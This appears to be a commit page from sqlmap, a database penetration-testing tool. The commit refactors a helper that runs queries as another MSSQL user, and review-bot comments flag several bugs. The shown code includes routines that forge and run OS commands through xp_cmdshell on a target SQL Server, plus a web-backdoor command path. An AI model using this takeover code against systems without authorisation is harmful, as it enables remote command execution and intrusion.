Commit add8352

Browse files
committed
make the runAsDBMSUser() generic and ported to abstraction.py so the same function will be used for PostgreSQL dblink() too
1 parent 6697927 commit add8352

2 files changed

Lines changed: 17 additions & 17 deletions


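--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -16,6 +16,7 @@
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@@ -37,6 +38,21 @@ def __init__(self):
         Web.__init__(self)
         xp_cmdshell.__init__(self)
 
+    def runAsDBMSUser(self, query):
+        if conf.dCred:
+            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
+                for sqlStatement in sqlStatements:
+                    if query.lower().startswith(sqlStatement):
+                        sqlType = sqlTitle
+                        break
+
+            if sqlType and "SELECT" not in sqlType:
+                query = "SELECT 1;%s" % query
+
+            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
+
+        return query
+
     def execCmd(self, cmd, silent=False):
         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
             self.webBackdoorRunCmd(cmd)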
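Review bot: `sqlType` in the new runAsDBMSUser is only bound inside the inner loop, so a query whose lowercased text matches none of the SQL_STATEMENTS prefixes reaches `if sqlType and "SELECT" not in sqlType:` with the name unbound and raises UnboundLocalError; add `sqlType = None` before the `for sqlTitle, sqlStatements in SQL_STATEMENTS.items():` line (note the `break` only leaves the inner loop, so a later title can still overwrite an earlier match). Only STATEMENT gets its single quotes doubled, while conf.dbmsUsername and conf.dbmsPassword are interpolated into the `run_statement_as_user` snippet as-is, so a credential containing `'` breaks or alters the generated T-SQL — apply the same `.replace("'", "''")` to USER and PASSWORD, assuming the snippet wraps them in single quotes. The commit message describes the helper as generic for PostgreSQL dblink() too, yet DBMS.MSSQL is hard-coded in the getSPQLSnippet call; a comment such as `# TODO: pick the snippet by the identified back-end DBMS once the PostgreSQL dblink() variant exists` would record that intent. execCmd at the end of the hunk continues outside it.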

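--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -21,7 +21,6 @@
 from lib.core.enums import DBMS
 from lib.core.enums import HASHDB_KEYS
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import SQL_STATEMENTS
 from lib.core.threads import getCurrentThreadData
 from lib.core.unescaper import unescaper
 from lib.request import inject
@@ -148,29 +147,14 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
             if cmd:
                 self.xpCmdshellExecCmd(cmd)
 
-    def xpCmdshellForgeRunAs(self, query):
-        if conf.dCred:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT 1;%s" % query
-
-            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
-
-        return query
-
     def xpCmdshellForgeCmd(self, cmd):
         self.__randStr = randomStr(lowercase=True)
         self.__cmd = "0x%s" % hexencode(cmd)
         self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
-        return self.xpCmdshellForgeRunAs(self.__forgedCmd)
+        return self.runAsDBMSUser(self.__forgedCmd)
 
     def xpCmdshellExecCmd(self, cmd, silent=False):
         cmd = self.xpCmdshellForgeCmd(cmd)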
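Review bot: `return self.runAsDBMSUser(self.__forgedCmd)` in xpCmdshellForgeCmd calls a method this file no longer defines; it now lives in Abstraction (abstraction.py), which, judging by the `xp_cmdshell.__init__(self)` call there, inherits from this class, so the mixin only works when instantiated through that subclass and a standalone xp_cmdshell instance would raise AttributeError at this line. A comment at the call site would save the next reader a search: `# runAsDBMSUser() is provided by lib.takeover.abstraction.Abstraction, which mixes this class in`. xpCmdshellExecCmd at the end of the hunk continues outside it.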
